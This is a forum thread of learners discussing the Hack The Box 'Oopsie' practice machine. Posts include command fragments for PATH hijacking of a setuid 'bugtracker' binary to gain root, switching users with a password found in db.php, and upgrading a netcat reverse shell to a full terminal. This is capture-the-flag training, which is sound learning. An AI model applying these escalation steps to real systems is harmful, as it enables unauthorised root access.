Oopsie Machine - Starting Point

Right now bugtracker doesn’t have the setuid bit set, so the cat shell just gives you normal permission. Something to check if you are running everything else right and it just doesn’t work.

robert@oopsie:/tmp$ /usr/bin/bugtracker

: EV Bug Tracker :

Provide Bug ID: 1

$ whoami
robert
$ ls -al /usr/bin/bugtracker
-rwxr-xr-x 1 root root 8792 Apr 16 02:56 /usr/bin/bugtracker

However bugtracker.save still has the setuid bit so that can work:
$ ls -al /usr/bin/bugtracker.save
-rwsr-xr-x 1 root bugtracker 8792 Jan 25 10:14 /usr/bin/bugtracker.save
$ /usr/bin/bugtracker.save

: EV Bug Tracker :

Provide Bug ID: 1

whoami

root

I am able to do that but when do cat /root/root.txt nothing happens

Never mind found it

@NeoCortex2000 said:
Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

I had the same problem and was fooled by the fact that r̶u̶n̶n̶i̶n̶g̶ misusing locate wasn’t turning anything up. You’ll find what you need if you keep looking.

Type your comment> @stevebytheway said:

@NeoCortex2000 said:
Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

I had the same problem and was fooled by the fact that running locate wasn’t turning anything up. You’ll find what you need if you keep looking.

Hey Steve yes I found it with the linux find command in the end: find / -name *.txt

I am in netcat and logged in as www-data
www-data@oopsie:
When I try to sudo robert im getting sorry try again?
I am using the password from the db.php file.
A I missing something?

@ritorix How did you get into the robert user account? when I attempt su robert and enter the password from the db.php file, it gives me “su: Authentication failure”

Looks like someone may have changed the password? I tried the same process today and it worked!

Type your comment> @kp22cfc said:

I am able to do that but when do cat /root/root.txt nothing happens

Never mind found it

how did you manage?? I can’t seem to be able to cat?!

@Jade86 said:
Type your comment> @kp22cfc said:

I am able to do that but when do cat /root/root.txt nothing happens

Never mind found it

how did you manage?? I can’t seem to be able to cat?!

ah ok. got it, sorry lol

OK. Noob here. I got all the way to the end and it looks like I did everything right. I run /usr/bin/bugtracker and get the correct output but I still don’t have access to anything. i.e. /root. I’ve gone through the walkthrough many times for over 16 hours and I get the same result. Any advice?

Hi guys, need help… script below is not working for me.

SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

this is what happening
www-data@oopsie:/$ SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xtermSHELL=/bin/bash script -q /dev/null
www-data@oopsie:/$ Ctrl-Z
Ctrl-Z: command not found
www-data@oopsie:/$ stty raw -echo
www-data@oopsie:/$ bash: fg: current: no such job
www-data@oopsie:/$ reset: unknown terminal type unknown
Terminal type?

help me understand what is happening here?

someone help me understand that Ctrl-Z is to send the nc connection in the background without killing it (this is where i was getting confused). then “fg” command brings it forward …

Hope this helps to users like me… :smile:

Type your comment> @deeptestpilot said:

Hi guys, need help… script below is not working for me.

SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

this is what happening
www-data@oopsie:/$ SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xtermSHELL=/bin/bash script -q /dev/null
www-data@oopsie:/$ Ctrl-Z
Ctrl-Z: command not found
www-data@oopsie:/$ stty raw -echo
www-data@oopsie:/$ bash: fg: current: no such job
www-data@oopsie:/$ reset: unknown terminal type unknown
Terminal type?

help me understand what is happening here?

Did you find how to solve Terminal type? I’m stuck at that point
Type your comment> @deeptestpilot said:

someone help me understand that Ctrl-Z is to send the nc connection in the background without killing it (this is where i was getting confused). then “fg” command brings it forward …

Hope this helps to users like me… :smile:

Type your comment> @deeptestpilot said:

Hi guys, need help… script below is not working for me.

SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

this is what happening
www-data@oopsie:/$ SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xtermSHELL=/bin/bash script -q /dev/null
www-data@oopsie:/$ Ctrl-Z
Ctrl-Z: command not found
www-data@oopsie:/$ stty raw -echo
www-data@oopsie:/$ bash: fg: current: no such job
www-data@oopsie:/$ reset: unknown terminal type unknown
Terminal type?

help me understand what is happening here?

Type your comment> @deeptestpilot said:

Hi guys, need help… script below is not working for me.

this is what happening
www-data@oopsie:/$ SHELL=/bin/bash script -q /dev/null
Ctrl-Z

Don’t copy and paste the block of code provided. After the SHELL command don’t type “Ctrl-Z”. Press the Ctrl and Z keypad buttons at the same time. This will throw you back to your attacker machine and put the shell in the background. So you should have your vm’s command line.

Then type the stty command. Enter.
Then type “fg” which will bring your shell cli back up. In the shell cli type “reset” and you will be asked what type of terminal to open. Type “xterm”. viola! I ran into this also

Thank you for the help… I was able to get both flags.

Type your comment> @KCPO said:

Type your comment> @deeptestpilot said:

Hi guys, need help… script below is not working for me.

this is what happening
www-data@oopsie:/$ SHELL=/bin/bash script -q /dev/null
Ctrl-Z

Don’t copy and paste the block of code provided. After the SHELL command don’t type “Ctrl-Z”. Press the Ctrl and Z keypad buttons at the same time. This will throw you back to your attacker machine and put the shell in the background. So you should have your vm’s command line.

Then type the stty command. Enter.
Then type “fg” which will bring your shell cli back up. In the shell cli type “reset” and you will be asked what type of terminal to open. Type “xterm”. viola! I ran into this also

Hi everyone
what is filezilla.xml and how to use it?
i tried filezilla but it said no route to host!

Type your comment> @falsepromise said:

Hi everyone
what is filezilla.xml and how to use it?
i tried filezilla but it said no route to host!

Type: vim filezilla.xml
This should reveal the file to you.

hi guys, I was able to do almost everything but got stuck on this

robert@oopsie:/$ export PATH=/tmp:$PATH
robert@oopsie:/$ cd /tmp/
robert@oopsie:/tmp$ echo ‘/bin/sh’ > cat
robert@oopsie:/tmp$ chmod +x cat
chmod: changing permissions of ‘cat’: Operation not permitted

ihave tryied differents paths but nothing works, still working on it

can you please help me?

Nvm, solved.

1

Got the flags for myself too. Thank you everyone in this thread!!